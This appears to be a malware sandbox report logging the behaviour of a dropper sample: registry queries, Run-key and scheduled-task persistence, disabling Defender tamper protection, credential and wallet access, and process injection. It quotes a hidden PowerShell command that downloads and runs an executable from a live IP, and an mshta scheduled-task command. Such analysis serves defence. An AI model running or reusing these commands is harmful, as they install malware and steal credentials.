| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dbcb8133.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\32dbcb8133.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3c485884af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091759001\\3c485884af.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\759b6f5ccf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091760001\\759b6f5ccf.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 4928 set thread context of 6036 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4968 set thread context of 6028 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 5956 set thread context of 6092 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
| PID 5688 set thread context of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848770725900965" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe
"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2672 -ip 2672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2672 -s 796
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 3U8Dqmawh4D /tr "mshta C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff993bbcc40,0x7ff993bbcc4c,0x7ff993bbcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1840,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1828 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2264 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3180,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4528 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,7577385884981499719,8889697950466107200,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8
